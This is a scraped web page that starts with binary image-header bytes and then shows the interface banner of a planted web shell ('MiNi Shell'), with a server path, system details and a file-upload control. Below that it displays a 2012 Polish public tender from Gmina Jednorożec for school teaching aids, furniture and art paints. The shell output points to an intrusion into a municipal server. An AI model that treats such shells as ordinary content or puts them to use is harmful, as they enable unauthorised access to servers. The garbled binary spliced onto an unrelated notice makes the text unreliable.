JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/248937-N-2012.html

<p class="kh_header"><b>Jednorożec: Sprzedaż i dostawa sprzętu dydaktycznego, mebli szkolnych i sprzętu multimedialnego do placówek oświatowych, dla których organem prowadzącym jest Gmina Jednorożec w ramach realizacji projektu nr WNA.POKL.09.01.02-14-05212 pt. Nauka i zabawa to świetna sprawa Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 248937 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Oświaty w Jednorożcu , ul. Odrodzenia 14, 06-323 Jednorożec, woj. mazowieckie, tel. 0-29 751-83-18, faks 0-29 751-83-18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.jednorozec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa sprzętu dydaktycznego, mebli szkolnych i sprzętu multimedialnego do placówek oświatowych, dla których organem prowadzącym jest Gmina Jednorożec w ramach realizacji projektu nr WNA.POKL.09.01.02-14-05212 pt. Nauka i zabawa to świetna sprawa Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykaz sprzętu dydaktycznego, mebli szkolnych i sprzętu multimedialnego wraz z opisem 
Publiczna Szkoła Podstawowa w Lipie 
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji
Pelikan  Pomoc ćwicząca za pomocą dotyku umiejętność szukania cech wspólnych jak kształt, wielkość, ilości. Minimum 8 kształtów bambusowych powtórzonych czterokrotnie różniących się kształtem i wielkością, 4 oddzielne woreczki w różnych kolorach wykonanych z grubego materiału, o mocnych szwach zakończonych bambusową obręczą. Zawartość umieszczona w poręcznej kolorowej tubie  1 szt.
Gąsienice  Pomoc dydaktyczna, która otrzymała certyfikat Klasy Marzeń pod patronatem MEN.4 kolorowe bambusowe specjalnie wyprofilowane łyżki o długości przynajmniej 21cm. Łyżki posiadają otwór oraz cienką gumkę ułatwiającą nałożenie i utrzymanie kulki na łyżce. 36 kulek w czterech podstawowych kolorach ponumerowanych od 1 do 9, oraz 4 wąskie materiałowe woreczki zakończone pierścieniem a z drugiej strony gumką. Całość zapakowana w poręcznej tubie. Produkt do ćwiczeń nauki pisania, przeprowadzenia zadań matematycznych zajęć ruchowych i utrwalenia liczb.1 szt.
Wieże  Pomoc dydaktyczna, która otrzymała certyfikat Klasy Marzeń pod patronatem MEN. Wykonana z bambusa, umieszczona w wysokiej tubie. Ponad 90 bambusowych specjalnie wyprofilowanych wypukłych kształtek w czterech podstawowych kolorach z otworem. 8 oddzielnych bambusowych pałeczek z kolorową rączką, umożliwiające nawlekanie kształtek na pałeczki. Ćwiczenia manualne i precyzyjne obu rąk równocześnie koordynacja ruchowa, szacowanie. 1szt.
Rybki  Zawartość umieszczona w poręcznej wysokiej tubie 31cm z uchwytem. Wykonana z twardej tektury z zamykaną pokrywką z tworzywa sztucznego, co umożliwi dzieciom szybkie sprzątanie i utrzymanie porządku. Zawiera 27 bambusowych rybek w 3 różnych kolorach o 3 kształtach okrągłym, podłużnym i trójkątnym,3 podwójne bambusowe pałeczki spięte dwoma gumkami, 3 kolorowe, bambusowe miseczki,3 bawełniane opaski do założenia na głowę z płynną regulacją, 2 kostki do gry z symbolem rybek i ilością od 1 do 3.Gra ćwiczy szybkość ruchu doskonali jej sprawność manualną i precyzję 1 szt.
Tangalo  2 drewniane pudełka jasne i ciemne, w których mieści się 7 drewnianych klocków o różnym kształcie i wielkości Zestaw zawiera 30 sztywnych kart z obrazkami. Każda karta posiada wycięty fragment, który dziecko musi wypełnić klockami z pudełka, według oznaczonej ilości przedstawionej na obrazku. Ćwiczy kierunkowość, orientacje przestrzenną, analizę i syntezę dobieranie właściwych elementów. Całość zamieszczona w kartonowym pudełku. 1 szt.
Schattenmemo płytki zadaniowe 130 drewnianych, kwadratowych płytek o wymiarach boku nie mniejszych niż 6 cm z kolorowymi obrazkami. Obrazki na płytkach są trwałe, trudno ścieralne, wykonane nietoksycznymi farbami, bliskie otoczeniu dzieci ze środowiska wiejskiego i miejskiego. Jeden obrazek powtarza się pięciokrotnie tzn. dwa razy jako kolorowy motyw, raz obrazek bez koloru z czarnym konturem, raz ten sam czarny motyw na białym tle, raz biały motyw na czarnym tle. Płytki umożliwiają: klasyfikowanie obrazków wg cech, figur, łączenie w pary, układanie prostych zdań, tworzenie historyjek, wyodrębnianie kształtu z głębi, zapamiętywanie szczegółów. Dołączona instrukcja w j. Polskim.  5 szt.

Schattenmemo plansza zadaniowa  Duże, żółte, drewniane, pudełko o wymiarach nie mniejszych niż wys.9, dł. 40, gł.17 cm z 5 szufladami o dł. nie mniejszej niż 17 cm, tak, aby móc pomieścić 26 płytek. W przedniej części szuflady znajduje się poręczna gałka o różnej kolorystyce z symbolem uśmiechniętej buźki, wyznaczająca ułożenie ciągu rytmicznego oraz różnorodnych zadań. Pudełko umożliwia utrzymanie porządku. Plansza jest integralną częścią do płytek zadaniowych schatenmemo. 5 szt
Kreativmemo wkłady zadaniowe  Minimum 220 obrazków umieszczonych na 28 długich szablonach wykonanych z masywnego, elastycznego tworzywa sztucznego. Szablony posiadają numerację pozwalającą rozróżnić grupy obrazków o bardzo różnorodnej tematyce pojęć pozwalające na klasyfikowanie wg stopnia trudności. M.in. pojęcie kredki, klaun, czarne koła.  3 szt.
Kreativmemo planasza zadaniowa Drewniane, kwadratowe pudełko o wymiarach nie mniejszych niż 29 cm z okrągłymi otworami i przykrywkami do nich. Otwory umożliwiają umieszczanie płaskich elementów. Plansza pozwala na przeprowadzenie zadań z zakresu płynności wzrokowej, szukania podobieństw i szczegółów oraz zajęć o różnej tematyce. Minimum 12 długich szablonów po 4 z każdej grupy wykonanych z tworzywa sztucznego z 96 obrazkami z podstawowymi pojęciami jak warzywa, owoce nad, pod, stary młody  3 szt.
Abecadło 150 liter  150 liter na 25 drewnianych sześcianach o wymiarach nie mniejszych niż 2,5cm. Na każdej ściance umieszczona jedna literka. Literki występują w 2 kolorach z podziałem na samogłoski czerwone i na spółgłoski  niebieskie. Zestaw zawiera polskie znaki takie jak: Ć, Ń, Ó, Ś, Ż, Ź. Klocki umieszczone w drewnianym pudełku o wymiarach nie mniejszych niż: 3,9 x 14,5 x 14,5 cm. Wielokrotnie powtórzone litery, przemyślane i sprawdzone ich ustawienie, daje możliwość tworzenia krótkich i długich wyrazów nawet 9 literowych przez dwie osoby równocześnie, budowanie prostych zdań obrazowe rozpoznawanie spółgłosek i samogłosek, przeprowadzanie ćw. ortograficznych, logiczne myślenie, koncentrację i spostrzegawczość Dołączona instrukcja w języku polskim. 10 szt.
Tablica z literkami  Składana, dwustronna, tablica z literkami o wysokości nie mniejszej niż 111cm wykonana z tworzywa sztucznego z jednej strony  tradycyjna zielona tablica  do pisania  kredą z drugiej biała, magnetyczna, sucho ścieralna tablica przeznaczona do pisania  markerem i możliwością przyczepiania magnetycznych literek i cyferek w zestawie min. 77. Nad każdą tablicą umieszczony  elastyczny klips z tworzywa sztucznego, umożliwiający przytrzymanie kartki podczas malowania lub rysowania. Pod tablicami znajduje się szeroka półka  do przechowywania, potrzebnych akcesorii. 2 szt.
Teatrzyk  Teatrzyk  scena   kolorowy teatrzyk o wymiarach nie mniejszy niż 94 x 78 x 22 cm, wykonany z trwałego tworzywa sztucznego o podwójnych ściankach wypełniony w środku powietrzem. Na froncie znajduje się sucho ścieralna naklejka/tablica do zapisywania tytułu przedstawień . Z tyłu teatrzyku  para ruchomych drzwiczek stanowi podpórkę konstrukcji a zarazem  imitujące  kasę biletową. Dwie półeczki wkomponowane w konstrukcję umożliwiają przechowywanie pacynek.  2 szt.
Kurtyna, oświetlenie, 2 pacynki  Zestaw akcesoriów do teatrzyku : oświetlenie typu LED z wyłącznikiem zasilane 3 bateriami AAA  nie załączone w zestawie, ruchoma czerwona dwuczęściowa kurtyna, 2 welurowe pacynki: chłopiec i dziewczynka o wysokości nie mniejszej niż 20 cm.  2 szt.
Puzzelator mozaika pojedyncza  12 antypoślizgowych, gumowych kwadratowych płytek o wymiarze boku nie mniejszym niż 25 cm: 8 płytek z kolorowym trójkątem przylegającym najdłuższym bokiem do boku płytki z wierzchołkiem trójkąta pośrodku płytki i 4 płytki każda w jednym kolorze żółta, czerwona, zielona, niebieska. Płytki można używać na zewnątrz i wewnątrz różnym i myć wodą. Płytki pozwalają na układanie różnych mozaiek, tworzenia lustrzanych wzorów i formułowania poleceń. Przy połączeniu z mozaikami podwójnymi uatrakcyjniają zabawę i zwiększają stopień trudności. Dołączona instrukcja w j. polskim.  1 szt.
Puzzelator mozaika podwójna 14 antypoślizgowych, gumowych kwadratowych płytek o boku nie mniejszym niż 25 cm 12 płytek z kolorowymi trójkątami przylegającym najdłuższym bokiem do boku płytki, stykające się wierzchołkami w środku płytki jeden kolor trójkąta jest niezmienny biały, 2 kolorowe płytki z 4 trójkątami w różnych barwach. Płytki można używać na zewnątrz i wewnątrz, myć wodą, a na spodniej części rysować kredą np.literki. Płytki te o wyższym stopniu trudności pozwalają na układanie różnorodnych mozaiek, tworzenia lustrzanych wzorów i formułowania poleceń. Dołączona instrukcja w j. polskim.1 szt.
Puzzelator karty zadaniowe  37 ponumerowanych kwadratowych kart zadaniowych o boku nie mniejszym niż 11 cm wykonanych z trwałego tworzywa sztucznego odpornego na użytkowanie na różnych podłożach, możliwość mycia wodą. Czym wyższy numer tym wyższy stopień trudności. Na kartach umieszczone są kolorowe mozaiki składające się z różnej ilości kwadratowych elementów i ustawione w różnej konfiguracji. Karty umożliwiają ćwiczenie spostrzegania, odwzorowywania i wyszukiwania szczegółów. W połączeniu z mozaiką pojedynczą i podwójną stanowią element do korygowania zaburzeń orientacji przestrzennej. 1 szt.
Puzzelator elementy do działań  Masywna drewniana skrzynka o wielkości nie mniejszej niż 21 x31 x 39 cm, na gumowych kółkach z mechanizmem metalowym, zamykana ruchomą pokrywą. Dołączony sznurek umożliwia przewożenie skrzynki. Skrzynka z przegródkami zawiera dwie duże, drewniane kostki o boku nie mniejszym niż 3 cm: kostka wyznaczająca kolor jednolity lub kolor podwójny, kostka z oczkami do 6 oraz 20 bawełnianych szarf w 4 podstawowych kolorach czerwonym, zielonym, żółtym i niebieskim. Ćwiczenia usprawniające percepcję wzrokową ,zdolności komunikacyjne, zabawy w zespole. Elementy te umożliwiają ćwiczenia usprawniające.1 szt.
Tęczowe liny z zapięciem  komplet 7 kolorowych lin o łącznej długości nie mniejszej niż 15 metrów. Wykonane z trzech warstw o splocie lewo i prawostronnym, średnicy nie mniejszej niż 12 mm Długość lin od najkrótszej do najdłuższej powinna mieć nie mniej niż 90 cm, 120 cm, 150 cm, 180 cm, 210 cm, 240 cm i 540 cm. Każda lina posiada dwa końce zakończone klipsem z magnesem, który pozwala na szybkie łączenie liny w całość lub połączenie kolejnych lin tworząc różne formy. Pozwala na układnie wzorów, tworzenie liter dużych i małych, kształtowanie lateralizacji chody kombinowane usprawniania szybkości ruchu ręki. Dołączona instrukcja w j. Polskim. 3 szt.
Tęczowe liny krążki  24 linowe krążki o średnicy nie mniejszej niż 8 cm połączone nierozerwalnym klipsem usprawniające szybkość ruchu ręki, celność, umiejętności zręcznościowe i rzutne. Duża drewniana kostka wyznaczająca kolor Całość umieszczona jest w bawełnianym worku zawiązywany sznurkiem. Krążki połączone z kolorowymi linami stanowią integralna cześć i wzbogacają ilość zabaw i ćwiczeń. 3 szt.
Fakturowe zgadywanki faktury cz.1  14 drewnianych kwadratowych płytek o wymiarach boków nie mniejszych niż 7 cm, z przytwierdzonymi na stałe różnorodnymi fakturami 7 rodzajów podwójnie powtórzonych m.in. materiał miękki, twardy, puszysty, zbity. 2 prostokątne, drewniane plansze o długości nie mniejszej niż 43 cm z 5 wyciętymi, kwadratowymi otworami o boku minimum 7 cm. Służy do stymulacji sensorycznej u dzieci z dysfunkcją narządu wzroku.3 szt.
Fakturowe zgadywanki faktury cz.2  14 drewnianych, kwadratowych płytek o wymiarach boków nie mniejszych niż 7 cm, z przytwierdzonymi na stałe różnorodnymi fakturami 7 rodzajów podwójnie powtórzonych m.in. papier, skóra, papier ścierny, tworzywo sztuczne. 2 prostokątne, drewniane plansze o długości nie mniejszej niż 43 cm z 5 wyciętymi, kwadratowymi otworami o boku minimum 7 cm. ćwiczenia wyobraźni umiejętności rozróżniania szczegółów i współpraca w grupie. 3 szt.
Fakturowe zgadywanki plansze 12 drewnianych, kwadratowych, płytek o wymiarach boków nie mniejszych niż 7 cm, z przytwierdzonymi na stałe różnorodnymi fakturami 6 rodzajów podwójnie powtórzonych. m.in korek, drewno, bambus. Duże drewniane pudełko z przegrodą zamykane wieczkiem. Ćwiczenia pamięci rozróżniania szczegółów, zdolności współdziałania.3 szt.
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie
Uśmiechnięta buźka 16 gal.  Skrzynia z bardzo masywnego tworzywa sztucznego, odpornego na uderzenia o wymiarach nie mniejszych niż 42 x 63 x 48 cm z wygodnymi uchwytami po bokach o pojemności w granicach 60 l. na boku skrzyni umieszczona naklejka z symbolem uśmiechniętej buźki a na pokrywie wesołe oczka. Łatwa w utrzymaniu. Przeznaczona do przechowywania artykułów i akcesoriów plastycznych, kubków na farby, farb, pędzelków, arkuszy papieru zabawek itp. oraz cięższych przedmiotów. Wypukła pokrywa umożliwia wykorzystanie większej ilości przestrzeni w pojemniku oraz stanowi dodatkowe siedzisko. 1 szt. 
Uśmiechnięta buźka 32 gal.  Skrzynia z bardzo masywnego tworzywa sztucznego, odpornego na uderzenia o wymiarach nie mniejszych niż 61 x 86 x 52 cm z wygodnymi uchwytami po bokach o pojemności w granicach 130 l., na boku skrzyni umieszczona naklejka z symbolem uśmiechniętej buźki a na pokrywie wesołe oczka. Łatwa w utrzymaniu. Przeznaczona do przechowywania artykułów i akcesoriów plastycznych, kubków na farby, farb, pędzelków, arkuszy papieru zabawek itp. oraz cięższych przedmiotów. Wypukła pokrywa umożliwia wykorzystanie większej ilości przestrzeni w pojemniku oraz stanowi dodatkowe siedzisko. 2 szt.
Magiczne kredki  Zestaw 18 sześciokątnych wielofunkcyjnych kredek w drewnianej oprawie. Trzy w jednym- rysują tradycyjnie na papierze, malują- naniesiony na papierze kolor wystarczy zamoczonym w wodzie palcem rozprowadzić po rysunku, aby stworzyć obraz jak namalowany akwarelą oraz pozwalają robić makijaż na ciele. Nietoksyczne i hipoalergiczne o szybkiej możliwości zmycia z ciała za pomocą wody. Trudno łamliwy grafit o grubości nie mniejszej niż 0,6 cm, długość kredki nie mniejsza niż 17,5 cm, średnica nie mniejsza niż 1 cm. Sześciokątny kształt ułatwia prawidłowe trzymanie kredki. Wszechstronność użycia kredek zachęca i motywuje do działania dzieci, które niechętnie chcą rysować. Kredki pakowane w przezroczystym, dwuskrzydłowym etui, wykonanym z tworzywa sztucznego, zapinany na metalowy zatrzask. Zawarta instrukcja w języku polskim.1 szt.
Pojemnik do farb  Zestaw 15 pojemników do farb z tworzywa sztucznego o pojemności nie mniejszej niż 100 ml, wysokości nie mniejszej niż 15 cm i średnicy nie większej niż 4 cm z aplikatorem o wąskiej dziurce pomagającej dozować ilość użycia farby oraz zatyczka. 20 szpatułek z masywnego tworzywa sztucznego o długości nie mniejszej niż 11 cm, zakończonej elastyczną giętką końcówką umożliwiającą precyzyjne rozprowadzania koncentratów farb na papierze oraz tworzenie ciekawych obrazów różniących się od malowania pędzelkiem. Całość mieści się w drewnianym pudełku z 18 przegródkami.1 szt.
Koło do malowania  zespół dwóch, drewnianych kół pasowych o średnicy jednego koła nie mniejszej niż 21 cm, i średnicy drugiego koła nie mniejszej niż 8 cm, obracających się na stalowych osiach. Koła posiadają na rancie wyżłobienie po którym przesuwa się gumowy pasek. Koła wprowadzane są w ruch. Można tworzyć formy plastyczne gdzie materiał tworzenia jest w ruchu1 szt.
Platforma z osłoną do farb Drewniana, kolorowa platforma do tworzenia abstrakcyjnych form plastycznych w kształcie łzy o długości 67 cm do niej dołączona osłona wykonana z trwałego tworzywa sztucznego o długości nie mniejszej niż 140 cm 4 kołeczki umożliwiają usztywnienie planszy tak, aby podczas kręcenia przy nakładaniu farby na koło nic się nie rozpryskało. 1 szt.
Farba Kri Kra Krea  biała  Nietoksyczny i hipoalergiczny koncentrat farby białej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1 i 3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  żółta Nietoksyczny i hipoalergiczny koncentrat farby żółtej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1:3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  pomarańczowa Nietoksyczny i hipoalergiczny koncentrat farby pomarańczowej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  jasnoczerwona  Nietoksyczny i hipoalergiczny koncentrat farby jasnoczerwonej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  czerwona  Nietoksyczny i hipoalergiczny koncentrat farby czerwonej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  różowa  Nietoksyczny i hipoalergiczny koncentrat farby różowej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach.1 szt.
Farba Kri Kra Krea  fioletowa  Nietoksyczny i hipoalergiczny koncentrat farby fioletowej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  jasnozielona  Nietoksyczny i hipoalergiczny koncentrat farby jasnozielonej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea zielona  Nietoksyczny i hipoalergiczny koncentrat farby zielonej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea  jasnoniebieska Nietoksyczny i hipoalergiczny koncentrat farby jasnoniebieskiej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
